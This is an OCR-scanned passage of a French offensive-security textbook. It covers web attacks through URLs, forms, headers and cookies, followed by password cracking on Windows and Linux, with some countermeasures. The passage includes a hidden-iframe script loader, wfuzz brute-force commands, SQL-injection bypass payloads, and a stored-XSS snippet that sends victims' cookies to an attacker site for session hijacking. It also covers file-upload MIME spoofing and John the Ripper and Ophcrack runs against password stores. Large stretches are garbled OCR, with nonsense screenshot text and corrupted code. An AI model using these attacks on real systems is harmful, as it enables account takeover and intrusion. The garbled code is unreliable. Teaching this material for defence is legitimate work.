qui fait appel à un autre site pouvant contenir le code Javascript que nous 
souhaitons utiliser. De plus, nous pouvons masquer l'iframe en lui donnant 
des dimensions nulles. Voici un exemple de code : <iframe width=0 
heïight=0 src=acissi.net/js attaque/> <7/1frame>. 
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Voilà, nous avons fait un premier tour avec les possibilités offertes par les 
URL. Il faut dans tous les cas faire de multiples essais pour tester la robus- 
tesse d'un site. Nous pouvons nous aider, là encore, de wfuzz et de diction- 
naires. Par exemple, pour vérifier que le filtrage sur la variable fog forumid 
est satisfaisant, nous pouvons lancer la commande suivante, puis analyser 
son résultat : 


python wfuzz.py -c -z file -f wordlists/big.txt --hc 404 --html 
http://localhost/fog/index.php?fog forumid=FUZZ 2>fog scanid.html 


Nous remarquons des écarts de longueur de page suivant la valeur de cette 
variable. En voici un extrait : 


00001: C=200 SSL 565 W "007" 
00002: C=200 337: TL 565 W "0007" 
00003: C=200 aTi 785 W "ON 
00004: C=200 Eru AN 565 W "007007" 
00005: C=200 413" E 785 W “HOO! 
00006: C=200 413 L 785 W "00000000" 
00007: C=200 413 HE 785 W La 
00008: C=200 413 L 785 W "000000" 
00009: C=200 490 L 1044 W DER 
00010: C=200 490 L 1044 W MOT 
00011: C=200 337 L 565 W "02" 
00012: C=200 337% 565 W "0249" 
00013: C=200 337: È 565 W “l'O0! 
00014: C=200 JIJA 565 W t1022 
00015: C=200 SAT 565 W "10snel" 
00016: C=200 38706 565 W "0246" 
00017: C=200 337 L 565 W OBN 
00018: C=200 337 E 565 W npon 


Nous pouvons aller voir ce qui s'affiche pour tous les retours avec un 
nombre de lignes ou de mots différents, comme pour 007, 0 et 1. Cela cor- 
respond, dans l'ordre, à un retour d'une catégorie qui n'existe pas, à un 
retour à l'accueil et à un retour sur une catégorie qui existe. Nous voyons 
bien que le principe est de tester toutes les possibilités et d'identifier le 
retour qui nous semble suspect. 
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4.1.3 Utilisation des formulaires 


Envoyer des données non attendues en utilisant les formulaires est une 
technique très efficace. Surtout si le programmeur, pensant que les champs 
cachés des formulaires ne peuvent contenir que ce qu'il a prévu, ne les teste 
pas. L'outil webscarab permet une modification facile de tous les champs 
des formulaires avant de les transmettre. Par exemple, réglons webscarab 
pour qu'il intercepte les requêtes POST dans l'onglet Intercept et postons 
un message sur notre forum fog. Notre envoi est arrêté par webscarab et 
celui-ci affiche tous les champs du formulaire comme le montre 
l'illustration suivante. 


Intercept requests: (È Intercept responses: L 


Version 


PETER CRETE LAN ns | ui S 


= sen | 
Deiere | 


fog.posted 12. 


insert 


Í | Delete 


stountcha = | 
CA 0e pe a EYE CI aeann 
LE Pasea | Raw 
Version Status Message 


| Avon guest Í Cancel AU imercepts 


Interception d'une requête POST avec WebScarab 


Nous pouvons modifier tout ce que nous voulons dans l'onglet Raw avant 
d'envoyer effectivement les données. Comme la longueur du message auto- 
risé, ou encore le nom du fichier attaché, etc. 


Il faut alors rechercher, comme dans le cas des URL, les variables qui sem- 
blent avoir une signification particulière pour le bon fonctionnement du 
système et les modifier pour provoquer des comportements anormaux per- 
mettant de détecter d'éventuels problèmes de filtrage des données. 
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Wfuzz peut là aussi être très utile car il est capable d'utiliser un diction- 
naire sur un champ de formulaire. Nous pouvons ainsi réaliser de nom- 
breux essais en peu de temps. Par exemple pour contrôler la robustesse du 
formulaire d'authentification. Nous pouvons capturer l'ensemble des champs 
du formulaire grâce à webscarab et les utiliser dans une commande wfuzz. 
La commade suivante tente un « brute force » sur le formulaire avec le nom 
d'utilisateur « codej » et en utilisant le dictionnaire « commons.txt » : 


python wfuzz.py -c -z file -f commons.txt --hc 404 --html -a 
"fog_ action=14fog userid=&fog path=http$3A%2F$2Flocalhosté2Frfog 
$2Findex.php%3Ffog r%3Dlogin%26fog action 

63D1%264fog pseudo=codejsfog password=FUZZe&fog cook=3650" 
http://localhost:80/fog/index.php?fog r=login 2>form _ fog.html 


Si le mot de passe est trouvé, le nombre de lignes ou de mots de la page 


retournée ne sera pas identique à celui renvoyé dans le cas d'une erreur 
d'authentification. 


Il est courant que, lors d'une authentification, l'identifiant et le mot de 
passe de l'utilisateur soient testés par rapport à un enregistrement dans une 
base de données. Si les variables sont mal filtrées et que le test sur la base 
de données se contente de vérifier que l'utilisateur existe avec le bon mot 
de passe, nous pouvons faire une injection SQL pour tenter de passer au 
travers de l'identification. Par exemple, si la requête ressemble à celle-ci : 


l select * from users where login='$login ' and pass='$password'; 


et que le script se contente d'obtenir une réponse positive sans contrôler 
l'enregistrement de retour, nous pouvons forcer une réponse vraie à la re- 
quête en injectant dans la variable $password la chaîne suivante «' OR 
1=1# ». La requête à la base de données devient alors : 


l select * from users where login='$login ' and pass='' OR 1=1 #$password'; 


Cette requête renvoie toujours une réponse vraie à cause du OR 1s1. La 
fin de la requête est mise en commentaire grâce au #. 


Il existe de multiples possibilités d'injection SQL, nous ne verrons ici que le 
principe car nous pourrions pratiquement consacrer un livre entier à cette 
technique. L'important est de comprendre la méthode afin de s'en prému- 
nir. 
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À titre d'exemple voici un extrait du dictionnaire SQL.txt de wfuzz : 


' or vit 

I or E AE E A 

LL or [LS ALES A 
ta) or ('x'='x 
0 or 1=1 

' or 0=0 -- 
"or 0=0 -- 
or 0=0 -- 

! or 0=0 # 

" or 0=0 # 

or 0=0 # 

" or 1=1-- 

" or 1=1-- 

1 or rI tsr lss 
"iI OT Y WEE E 
or l1=1-- 


Un petit add-ons Firefox SQL Inject Me, permet d'obtenir un nouveau 
panneau sur la gauche du navigateur, comme le montre cette illustration, 
permettant de régler les paramètres d'injection puis de lancer une batterie 
de tests. 


ACISSI - Mozilla Firefox m 
Fichier Édition Affichage Historique Marque-pages 

tè: DO & y [htp/wwwadssinet 
Ba Most Visited» @Getting Started !“Latest Headlines + 


&Disable &Cookies* CSS" “Forms” Žimages» information? Miscellaneous» Outline- }{Resizer Tools- View Source “Options 
SQL Inject Me 


@, Security 
| ©, Compass 


SQL Inject Me 


TARUS. JUSL LE NE QUUU values LU of UNE EUS OU IAIN y 
which ones are to be tested (they will become yellow) 
then dick either "Test with All Attacks" or “Test with Top 
Attacks" 


est oies with all attacks] 


search-theme-form 


Ar taeun atesti ] BlackKOut Hadoni En maret des 
ESS Cliquez ici pour en savoir plus T 


© {search theme foim |:} 


k 
i 


form_buhd_1d 
{form-44a012dach72feBfabof7 1c16333372 [ul 


op 
© [Recherche [a 


search_Hieme,_ form 


© [change this to the value you want tested [z] 


Terminé 


| Proxy: Aucun 4 


Panneau de gauche de SQL Inject Me 
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Cet outil affiche ensuite un rapport au format html, comme présenté 
ci-dessous. 


Results - Mozilla Firefox m m 
Eichier_Êdition Affichage Historique Marque-pages Outils Aide 
+ Foar mprresults_1244965768774.tmp 
ÆMost Visited- @Getting Started ELatest Headlines + 
#Disable: SCookies" _:CSS: Forms" “Images SlInformation: > Miscellaneous: — Outlines !{Resize” Tools: & View Source Options» xa 9 
| SOL Inject Me x [A ACISSI © o RT Results KE z 


| Securty 
© imps 


Jre Test Results 
SQL Inject Me i 


SQL Inject Me let test the r F 
ERR So nee T, SAL Injection String Tests Summary (58480 results recorded) 


vulnerabilities. Fales [ 


Each tab represents a form on the page — warmings 
STe EE 
values for all the fields and mark which 


ones are to be tested (they will become 


yellow) then click either "Test with AIl 
Attacks” or "Test with Top Attacks". SQL Injection String Test Results 


S i APE CES search_theme_form 
Test all forms with all attacks] = = 
ja $ 


Test all forms with top attacks; 
E EEP ee tomm_buald id: fon-44a012dacb7AeEtebts71016H3 3372 
Ho Forms form_id séarch_theme_form 


Sorry, this page has no forms. | 


Rapport généré par SQL Inject Me 


Utilisation de l'en-tête 


Comme pour les URL et les formulaires, les en-têtes peuvent contenir des 
données sensibles que nous pouvons modifier facilement. Là encore nous 
pouvons utiliser WebScarab ou Burp Suite, mais il existe aussi deux petits 
add-ons Firefox permettant la modification des en-têtes. Modify Headers 
qui permet de définir les modifications que nous souhaitons apporter à 


l'en-tête lors de notre navigation. C'est à nous de définir les champs 
d'en-tête comme le montrent les deux illustrations ci-après. 
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En-tètes HTTP en direct RE i 
| En-têtes [Générateur | Configuration! À propos 


En-têtes HTTP. 


http://ww w.cnil.fr/ 


ae 


GET / HTTP/1.1 

Host: www.cnil.fr 

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/20... 
Accept: text/html,application/xhtml+xml.application/xml:4=0.9,*/*;q=0.8 
Accept-Language: fr,fr-fr:q=0.8,en-us;q=0.5,en;q=0.3 

Accept-Enceding: gzip,deflate 

Accept-Charset: IS0-8859-1,utf8;4=0.7,*;4=0.7 

Keep-Alive: 300 

Connection: keep-alive 


HTTP/1.x 200 OK 
Bate: Sun, 14 Jun 2009 08:05:09 GMT 
Server: Apache/2.2.3 (Red Hat} 


AIDE 1 e 


Enregistrer tout... -Rejouer…. 3 Capturer E Effacer | 2 Fermer ] 


Modify Headers 


A f eme j oag peee A 
| Action [Name Value | Comment. 


User-Agent mon navigate... 
Modify Referer mapage.com 


® Disabled 


l Configuration] 
F Open Help. | 


Changement des éléments de l'en-tête avec Modify Headers 
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« Live HTTP Headers » permet de capturer l'en-tête envoyée, de la modifier 
et de la rejouer. Nous pouvons par exemple faire croire que nous sommes 
sous IE alors que nous naviguons sur Firefox. Nous pouvons aussi changer 
la ligne « Referer » pour faire croire que nous venons d'un site alors que nous 
venons d'un autre. Par exemple, certains sites n'autorisent que certaines 
actions à condition de venir du site même et non d'un site extérieur. Nous 
pouvons alors tromper cette vérification. L'illustration suivante montre 
comment nous trompons le site de la Cnil sur les traces que nous laissons 
normalement grâce à Modify Headers. 


” Yes obli Liens | et que votre adresse DNS est: 
r Vos traces Nous pouvons voir que votre ordinateur utilise le système d'exploitation : 


Votre navigateur a pour nom de code : 


men navigateur perso 
mais c'est en fait 
navigateur non reconnu {?77?) 
Votre écran a une résolution de : 
pas PT Rs 1448 x 900 pixeis. 
r Lexique Pour accéder à cette page, vous avez cliqué sur un lien situé à l'adresse suivante : 


one nr nn 
” Questions-réponses Cette page montiecommentle serveur peut expléiter les variables d'environnement de 


votre navigateur. Cette démonstration n'a peut être pas fonctionné. Dans ce Cas, 
= découvrez pourquoi 

COMMENT ÇA MARCHE ? 

Adresse IP, adresse DNS et signature du navigateur 


Terminé | Proxy: Aucun 


Le site de la Cnil ne voit plus nos vrais paramètres 
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4.1.5 Utilisation des cookies 


Les cookies sont des petits fichiers que nous envoient les sites afin de 
mémoriser des informations sur notre profil, ou l'historique de notre navi- 
gation. Tous ces cookies sont parfaitement modifiables. Nous pouvons uti- 
liser classiquement les deux outils présentés précédemment, WebScarab et 
Burp Suite, mais nous allons choisir, pour découvrir un nouvel add-ons de 
Firefox, d'utiliser Add N Edit Cookies. Nous aurions aussi pu très bien 
modifier les cookies avec la barre Web Developer. 


AnEC Cookie Editor vO.2.1.3 


g filtre / Rechargement 


Qu 
lacissi.net _utmb | 
acissi.net _utmce | 


[Nomide Cookie 


acissi.net utma 

acissi.net __utmz 

acissi.net SESS0e01110f0db41f9c9a15efbh5cl1e96h9 
www.acissi.net has_js 


Note ! La liste ci-dessus n'est pas automatiquement mise à jour quand le gestionnaire de cookie est ouvert. 
Information sur le cookie sélectionne 

Non: : 
Contenu : 
Hôte : 
Chemin : 
Envoyer vers : 
Expire : 


Sélection : Cookie : 
|} Éditer El Ajouter ] f Supprimer | tanie 
Inverser... 


Un add-on pour éditer les cookies 


Nous visualisons l'ensemble des cookies que nous avons reçus depuis le 
début de notre navigation. Nous pouvons les éditer pour les modifier. Nous 
pouvons aussi en créer des nouveaux. Là encore il faut observer. Si nous 
avons un cookie dont le contenu est admin=0 il y a certainement des cho- 
ses à essayer. Nous restons sur le même principe d'altération des données 
que dans les points précédents. 
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42 Le vol de session 


Il est extrêmement répandu que l'identification d'un utilisateur se fasse 
uniquement sur un identifiant stocké dans un cookie. Comme le Javascript 
nous permet d'obtenir l'ensemble des cookies d'une page grâce à docu- 
ment.cookie, il est alors envisageable de récupérer l'identifiant de session d'un 
utilisateur. Si celui-ci est de plus l'administrateur du site, cela devient vrai- 
ment dangereux. Une technique pour réaliser cette opération consiste à 
poster sur un forum un message contenant du Javascript. Lorsqu'un utilisa- 
teur va visualiser notre message, le code Javascript va s'exécuter dans son 
navigateur. Toute l'astuce revient à mémoriser dans la variable document.re- 
ferrer les cookies de la victime et de les diriger vers notre site. À son arrivée, 
il nous suffit d'enregistrer l'information d'en-tête, referer et de nous faire 
parvenir, par exemple par e-mail, cette information. Nous disposons alors 
de l'identifiant de session de l'internaute. Nous nous rendons sur le site du 
forum et recréons un cookie identique à celui de la victime. Le site ne peut 
alors plus nous distinguer de la victime. Il considère qu'il s'agit d'une seule 
et même personne. Nous avons donc les mêmes droits et pouvons poster 
des messages en son nom. Nous pouvons même changer son mot de passe | 


Cette technique est une attaque de type stored XSS. Voici un exemple de 
code que nous pouvons poster sur un forum : 


<script>document.referrer=document.cookie</script><a 
href=''site pirate.org''>lien</a> 


Nous incitons la victime, par un message motivant, à venir sur notre site. 
Nous pouvons récupérer les données transmises avec un script PHP. À titre 
d'exemple, voici comment les afficher pour faire des essais : 


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" 
http://www.w3.org/TR/htm14/1lo0se.dtd"> 
<html> 
<head> 
<title>xss</title> 
<meta name="GENERATOR" content="Quanta Plus"> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
</head> 
<body> 
<?php 
echo “On vient de :".$ SERVER('HTTP REFERER']; 
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</body> 
</html> 


Nous nous rendons sur le forum attaqué. Nous modifions ou créons, sui- 
vant le cas, un cookie de session avec Add N Edit Cookie. 


Ajouter / Éditer un cookie ” 


EL E E EASES L LAES SEE EO AN EA 


Information sur le cookie sélectionné 


Nom : | SESS0e01110f0db41f9c9al15efbb5c1e96b9 


Contenu : | 95351b8a581756b05832abaa6905efa7 


Domaine : | .acissi.net 


Chemin : m 


O Connexions cryptées se 


Envoyer vers: ® Tout type de connexion 


07/07/2009 14:44:21 


® Expire : 


Expire: O Expire à la fin de la session 
Q Nouvelle date d'expiration : 


Modification d'un cookie de session avec Add N Edit Cookie 


L'illustration ci-après présente par un petit schéma le mécanisme de cette 
attaque. 
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Application 


3 : la victime 

exécute le 

javascript 
Et 


2 


Les étapes d'un hijacks de session par XSS stored 


Ainsi, nous sommes identifiés comme la victime et avons tous ses droits. 
Magique ! Bien entendu nous avons ici recopié l'identifiant grâce à l'affi- 
chage sur le site pirate, mais dans la pratique il faut récupérer cette infor- 
mation par une autre voie : écriture dans un fichier texte, e-mail, ftp, etc. 


Le dépôt de fichiers malicieux 


Avec l'arrivée des sites dynamiques et la croissance des services proposés 
aux internautes, il est courant d'avoir la possibilité de déposer un fichier sur 
le serveur hébergeant le service. Par exemple déposer son avatar, ou une 
photo sur un forum, ou encore un document de bureautique. Il est donc 
très important que le serveur vérifie le type et la taille de la pièce envoyée 
sous peine de se retrouver, non pas avec une image, mais avec du code exé- 
cutable. 
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Le type MIME définit la nature du fichier suivant une norme. En voici 
quelques exemples : 

- image/jpeg : image de type jpeg défini dans la RFC2045 et 2046 

- image/gif : image de type gif défini dans la RFC2045 et 2046 

- text/html : document de type html défini dans la REC2854 

- application/pdf : fichier de type pdf 

- application/msword : fichier de type Microsoft Word 

- etc. 


Si le serveur se contente de vérifier le type MIME du fichier, nous pouvons 
changer celui-ci avant son envoi. Il est alors possible de faire croire au ser- 
veur qu'il dépose bien une image alors que c'est un fichier PHP. Sur l'illus- 
tration suivante nous interceptons le dépôt d'un fichier PHP. Nous pou- 
vons modifier son type MIME dans Multipart - Fichier - Content-Type. 
Nous changeons application/octet-stream par image/jpeg pour tromper 
le serveur. 


Intercept requests: #} Intercept responses: [] 


fichier 
upload 


Value 
È formi-daa, name="fichier; filenames” E 
lic: 


£ Parsed Priwe ere 
Version Status Message 


Header 


Song 


Abon request 


Edit Racu F=18:44 E 


Modification du type MIME avant le dépôt d'un fichier 
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Une fois notre script déposé, il suffit de l'appeler dans notre navigateur 
pour qu'il s'exécute. Si en plus le serveur permet l'utilisation de la fonction 
exec() en PHP, nous pouvons exécuter directement des commandes sur 
celui-ci. Cette faille est très dangereuse car le serveur peut alors servir de 
base d'attaques vers d'autres sites. 


Contre-mesures et conseils de sécurisation 


Filtrer toutes les données 


Nous avons constaté au cours des différentes attaques présentées que tou- 
tes les données renvoyées par un client peuvent être altérées. Il est donc 
indispensable de filtrer l'ensemble des informations que le serveur reçoit 
avant d'engager toute action de celui-ci. Une des techniques de filtrage qui 
fonctionne extrêmement bien est l'utilisation des expressions régulières. Il 
existe beaucoup de documentation sur celles-ci et ce livre n'est pas l'objet 
d'un cours sur le regex. 


MRemarque 


Une expression rationnelle ou expression régulière est en informatique une 
chaîne de caractères que l'on appelle parfois un motif et qui décrit un en- 
semble de chaînes de caractères possibles selon une syntaxe précise. Les 
expressions rationnelles sont issues des théories mathématiques des langages 
formels des années 1940. Leur puissance à décrire des ensembles réguliers ex- 
plique qu'elles se retrouvent dans plusieurs domaines scientifiques dans les 
années d'après-guerre et justifie leur forte adoption en informatique. Les ex- 
pressions rationnelles sont aujourd'hui utilisées par les informaticiens dans l'édi- 
tion et le contrôle de texte ainsi que dans la manipulation de langues formelles 
que sont les langages de l'informatique [source : Wikipédia). 
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Vous trouvez deux types de fonction en PHP pour les expressions ration- 

nelles : 

- Les fonctions POSIX qui est l'acronyme de Portable Operating System Inter- 
face dont le X exprime l'héritage UNIX. 

- Les fonctions PCRE qui est l'acronyme de Perl Compatible Regular Expres- 
Sions. 


Les fonctions PCRE présentent plus d'avantages que les fonctions POSIX : 
- Plus rapides ; 

- Utilisation des références arrières ; 

- Capture de toutes les occurrences. 


Les fonctions PCRE : 

- preg_grep : retourne un tableau avec les résultats de la recherche ; 

- preg_quote : protection des caractères spéciaux des expressions rationnel- 
les ; 

- preg_match : expression rationnelle standard ; 

- prg_match_all : expression rationnelle globale ; 

- preg_replace : rechercher et remplacer par expression rationnelle stan- 
dard ; 

- preg_replace_callback : rechercher et remplacer par expression rationnelle 
standard en utilisant une fonction de callback ; 

"Ete. 


À toutes les fonctions PCRE il faut passer un motif (pattern) qui décrit ce 
qui est recherché. Les motifs sont composés de caractères et de symboles. 
- Les caractères littéraux : 
- a correspond à la lettre "a" et rien d'autre ; 
- chat correspond au mot "chat" et rien d'autre. 
- Les symboles de début et fin de chaîne et le point : 
- ^ indique le début de la chaîne — exemple : © chat reconnaît une ligne 
qui commence par chat ; 
- $ indique la fin de la chaîne - exemple : chat$ reconnaît une ligne qui 
finit par chat ; 
- . le point indique n'importe quel caractère. 
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- Les symboles quantificateurs : 
- * indique 0, 1 ou plusieurs occurrences du caractère ou de la classe 
précédente ; 
- + indique une ou plusieurs occurrences du caractère ou de la classe 
précédente ; 
- ? indique 0 ou une occurrence du caractère ou de la classe précédente. 
- Les intervalles de reconnaissance : 
- a{3} correspond exactement à aaa ; 
- a{2,} correspond à un minimum de deux a consécutifs soit aa, aaa, 
aaaaa... ; 
- a{2,4} correspond uniquement à aa, aaa, aaaa. 


Nous nous arrêterons là, car des ouvrages entiers sont consacrés aux 
expressions rationnelles et ce n'est pas l'objet de ce livre. Nous finirons par 
quelques exemples pour illustrer cette description : 
- pour retirer tous les caractères autres que les chiffres d'une expression : 
$nbrl=preg replace("{[7"0-9]}","",Snbrl) 
- autres exemples de motifs : 
- nombre entre 1 et 100: "([1-9]$|"[1-9]\d4$|"100)$ 
- validation d'une date : 
PROTESTANT 
LES TOI EXP CCE 


ANNEE CELOSTI LETOO] 
PGES] FOS] OS S MOES ITS 


WILO 
-9] [0-9 


Renforcer l'identification du client 


Nous avons vu précédemment que l'identification d'un client par un seul et 
unique cookie n'est pas suffisante. Il faut que le serveur mémorise d'autres 
informations sur le client sans pour autant diminuer l'aspect fonctionnel 
du service proposé. Il serait inconcevable de demander à nouveau son iden- 
tifiant et son mot de passe à un internaute pour chaque action qu'il réalise. 
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L'idée de mémoriser l'adresse IP du client est souvent présentée. Mais si 
celui-ci est en IP dynamique, il perd sa session lors de son changement d'IP. 
Ce phénomène peut être très gênant. Par contre le serveur peut mémoriser 
la chaîne d'identification du navigateur, la résolution de l'écran du client ou 
encore son système d'exploitation. Dans ce cas, même si le pirate réussit à 
voler le cookie de session d'un usager, il faudra encore que celui-ci soit dans 
une configuration strictement identique au client. Sans garantir à 100 % 
qu'il ne sera plus possible d'usurper la session d'un internaute, cela 
deviendra beaucoup plus difficile. 


Configurer judicieusement le serveur 


Comme nous l'avons déjà évoqué, il est souhaitable que notre serveur soit 
le moins bavard possible. Pour cela nous devons le configurer correctement. 
Sur Apache2, deux variables dans les fichiers de configuration sont à régler 
correctement : 

- Il est possible de désactiver la présentation du serveur dans l'en-tête avec 
la directive : ServerTokens Prod. 

- Il est préférable de désactiver la signature du serveur, dans les fichiers 
d'erreurs par exemple, avec la directive : ServerSignature off. 

- De plus, il ne faut pas oublier d'empêcher le serveur de lister les fichiers 
d'un dossier sauf si c'est le comportement recherché. Pour cela, il faut 
retirer Indexes et FollowSymLinks des options car c'est le réglage par 
défaut comme le montre l'exemple suivant : 


<Directory /var/www/> 
Options Indexes FollowSymLinks MultiViews 
AllowOverride None 
Order allow,deny 
allow from all 
</Directory> 


Chaque type de serveur possède ses propres directives. L'important est de 
prendre conscience qu'il faut s'intéresser de près à la configuration de notre 
serveur et de ne pas laisser les réglages par défaut comme nous avons tous 
tendance à le faire. 
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6. Conclusion 


L'objectif de ce chapitre était de vous faire prendre conscience des problè- 
mes de sécurité que nous pouvons rencontrer sur le Web. Nous vous en 
avons donné un petit aperçu. Comme nous l'avons évoqué, il existe telle- 
ment de situations, de langages, de serveurs, qu'il faudrait plusieurs livres 
pour tout aborder. Mais si à la lecture de cette partie vous avez à l'esprit 
qu'il faut filtrer tout ce qui vient du client et ne pas négliger la configura- 
tion du serveur, c'est déjà pas mal, vous serez protégé à 98 %. Les 2 % res- 
tant à combler étant d'un niveau de difficulté beaucoup plus élevé. Rien 
n'est jamais protégé à 100 %. 
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1. Généralités 


Les systèmes d'exploitation sont de plus en plus sophistiqués et simplifient 
énormément les choses. En effet, les mécanismes sous-jacents, parfois très 
compliqués, sont masqués afin que le plus grand nombre puisse se servir de 
l'outil informatique, malheureusement souvent au détriment de la sécurité. 


Cependant, depuis quelques années, les concepteurs essaient d'inclure de la 
sécurité, mais les utilisateurs n'étant pas habitués ou formés pour l'appré- 
hender, c'est souvent un échec. En effet, lorsqu'ils sont trop contraïgnants, 
les utilisateurs préfèrent désactiver les mécanismes mis en place. Par 
exemple, pour éviter de saisir sans arrêt un mot de passe. C'est ainsi que, 
combiné avec la facilité d'obtention d'un ordinateur et de l'accès à Internet, 
le nombre de machines zombies permettant des attaques dissimulées 
augmente. 


Mais le constat ne s'arrête pas là : à l'origine simple assemblage d'électro- 
nique, les éléments de notre quotidien comme les réfrigérateurs, télévi- 
seurs... embarquent désormais des systèmes d'exploitation à part entière 
qui peuvent être modifiés. De plus, à l'heure du tout communiquant, ces 
matériels constituent des risques supplémentaires, dont les issues peuvent 
être critiques : l'alarme de la maison désactivable depuis Internet en est 


l'exemple. 
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2. 


2.1 


2.2 


Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


Voyons dans cette partie du livre les faiblesses de nos systèmes, comment 
les exploiter, mais surtout comment s'en protéger. 


Les mots de passe 


Introduction 


Les mots de passe restent actuellement le moyen le plus répandu pour con- 
trôler les accès à des ressources restreintes. Ils sont utilisés depuis des siè- 
cles, notamment dans le domaine militaire, et ils interviennent à de nom- 
breux niveaux : lorsque nous démarrons notre ordinateur, lorsque nous 
relevons notre courriel... 


En informatique, un mot de passe est une suite de caractères, pas forcé- 
ment constituée que de chiffres et de lettres, avec ou sans signification. 


Révéler un mot de passe sous Microsoft Windows 


Commençons par une astuce très facile : afficher un mot de passe masqué 
par des étoiles ou des points. 


Certaines applications proposent de retenir des mots de passe. Ceci est bien 
pratique puisque lorsque ces dernières sont exécutées, le champ de saisie 
est prérempli et il ne reste qu'à valider. Le mot de passe est bien entendu 
masqué par des étoiles ou des points, mais ce masquage est facilement 
déjouable avec des outils comme Asterisk Logger : 
http://www.nirsoft.net/utils/astlog.html 
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Explorateur Windows 


Nom dutisateur futtaateur 


Mot depasse: resesoosns 


F7 Erregaber ce nom d'ffssieur et ce moi de passe pour les | 
Ltisæeurs euverts : Š =, 


© Moi uniquement 
€) Toute personne qui lise cet ordnateur 


(E comede) L Are ] [hope | ! 


Révélation des mots de passe masqués 


Il suffit de lancer le programme dont il faut récupérer le mot de passe, puis 
d'exécuter Asterisk Logger. Le mot de passe apparaît alors en clair dans la 
fenêtre de ce dernier. 


2.3 Complexité 


Sans faire de cryptologie approfondie, la force d'un mot de passe se définit 
par sa complexité à être deviné, trouvé. Il faut bien comprendre qu'un mot 
de passe n'est pas une garantie de protection absolue. Il permet seulement 
de ralentir, plus ou moins efficacement, un attaquant. En effet, l'essai de 
toutes les combinaisons permettra nécessairement au final d'obtenir l'accès 
au système protégé. 

Prenons un cas réel : la perte du code d'un antivol de vélo, constitué de 
trois rouleaux numérotés chacun de 0 à 9. Chaque rouleau a donc 
10 valeurs. Les 3 rouleaux permettent alors 10*10*10 possibilités, soit 1000. 
Les essais successifs de ces 1000 combinaisons pouvant être effectués en un 
temps raisonnable, la serrure peut être déverrouillée sans en connaître le 
code. 
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2.4 


Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


En informatique c'est pareil, et même pire. L'automatisation est possible et 
un ordinateur ira vraiment beaucoup plus vite. Cependant, la longueur, 
c'est à dire le nombre de caractères constituant le mot de passe, peut être 
beaucoup plus longue et les caractères possibles sont plus nombreux. La 
tâche n'est alors pas si facile car le nombre de possibilités devient rapide- 
ment gigantesque. Mais, par facilité, la plupart des gens choisissent un mot 
de passe ayant un sens dans leur langue, et une signification pour eux, 
comme par exemple le prénom du conjoint. Autrement dit, une suite de 
mots qui peuvent être extraits d'un dictionnaire. Les possibilités sont alors 
très restreintes. 


À ce niveau, les recommandations sont les suivantes : un mot de passe doit 
être suffisamment long, au moins 6 caractères, constitué de caractères 
alphanumériques, c'est-à-dire chiffres, lettres, majuscules, minuscules, et de 
symboles comme #, %, |, … 


Une pratique courante est de prendre un mot, par exemple, "réseau", et d'y 
appliquer les règles précédentes : « @R3S34u* ». Nous obtenons alors un 
mot de passe suffisamment complexe et néanmoins mémorisable. 


Le stockage des mots de passe 


Si l'attaquant possède déjà un accès sur la machine, il peut tenter de récu- 
pérer le mot de passe stocké sur le système. L'attaque n'a alors pas lieu 
durant la phase d'authentification. 


Le mot de passe peut être stocké à différents endroits, en clair, chiffré ou 
haché : directement dans le programme d'authentification, dans un fichier 
ou dans une base de données. Un mot de passe est stocké en clair lorsqu'il 
est directement lisible. Il est chiffré lorsqu'il a subi certaines transforma- 
tions pour être stocké sans être lisible. Les opérations inverses seront alors 
effectuées lors de la vérification du mot de passe. Enfin, un mot de passe 
est dit haché lorsque des opérations irréversibles ont été effectuées pour le 
stocker. À la vérification, ces mêmes opérations seront appliquées à la saisie 
de l'utilisateur. Le résultat sera alors comparé à ce qui est stocké. L'égalité 
garantit que le mot de passe saisi est le bon. 
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En hachage, la sécurité repose sur le fait que les transformations irréversi- 
bles ne donnent pas deux résultats identiques pour deux mots de passe dif- 
férents. Si c'est le cas, on parle de collisions. 

Le hachage est la méthode la plus couramment utilisée, mais un autre pro- 
blème se pose : si sur deux machines différentes le même mot de passe est 
utilisé, le même hachage sera stocké. Il est alors possible de trouver un mot 
de passe par comparaison des hachages. Un procédé appelé le salage, qui 
ajoute une séquence de bits non liée directement au mot de passe, permet 
d'éviter cela. Or, sous Microsoft Windows, le salage n'est pas employé dans 
la gestion des mots de passe. 


Cas pratique : trouver les mots de passe 
sous Microsoft Windows 


L'algorithme utilisé pour stocker les mots de passe par Microsoft Windows 
est vulnérable. Avec un utilitaire comme Ophcrack, qui utilise des tables de 
mots de passe prégénérés, appelées Rainbow Tables, un mot de passe cou- 
rant se retrouve rapidement. Des Rainbow Tables sont disponibles avec 
Ophcrack ainsi qu'une version livecd de l'outil. Attention, ces tables ont 
une taille conséquente. 


Récupération de la base de données des mots de passe. 


cm Connectez-vous en administrateur (ou utiliser un livecd) car la base est 
verrouillée à l'exécution par le noyau de Windows. 


a Cliquez sur Load, Local SAM : la liste des utilisateurs apparaît. 
a Cliquez sur Tables : la liste des Rainbow Tables disponibles s'affiche. 
a Cliquez sur Crack pour commencer l'attaque. 


Les mots de passe s'affichent après quelques minutes. 
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 7CE21F17C0AEE 7FB9CEBAS3200546AD6 
31décfe0d 162893 1b73c 59d7e0c089c0 


Progress 


Crackage des mots de passe avec ophcrack 


2.6 Cas pratique : trouver les mots de passe sous GNU/Linux 


GNU/Linux utilise le salage et les mots de passe sont stockés dans le 
fichier /etc/shadow. Il est alors nécessaire d'essayer toutes les possibilités 
jusqu'à trouver le bon mot de passe, technique connue sous les termes "réa- 
lisation d'une attaque par la force brute ou en brute force". Nous utilisons 
un dictionnaire pour optimiser nos recherches, un fichier texte contenant 
un mot par ligne. Il en existe de nombreux sur Internet et certains sont 
déjà installés, comme le dictionnaire de la langue française contenu dans le 
fichier /usr/share/dict/french. 
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Nous allons utiliser John the Ripper sous le compte administrateur (root), 
puisque théoriquement seul ce dernier peut accéder au fichier des mots de 
passe, pour des raisons évidentes de sécurité. Une attaque en pure "brute 
force" s'effectue par la commande john /etc/shadow. Une attaque 
hybride (combinaison de dictionnaire et de "brute force") par : john 
--wordlist=/usr/share/dict/french /etc/shadow. Essayez ces 
deux méthodes et vous verrez la différence significative en terme de temps 
pour trouver le mot de passe | 


BRemarque 


John est capable de s'attaquer également aux mots de passe Windows. 


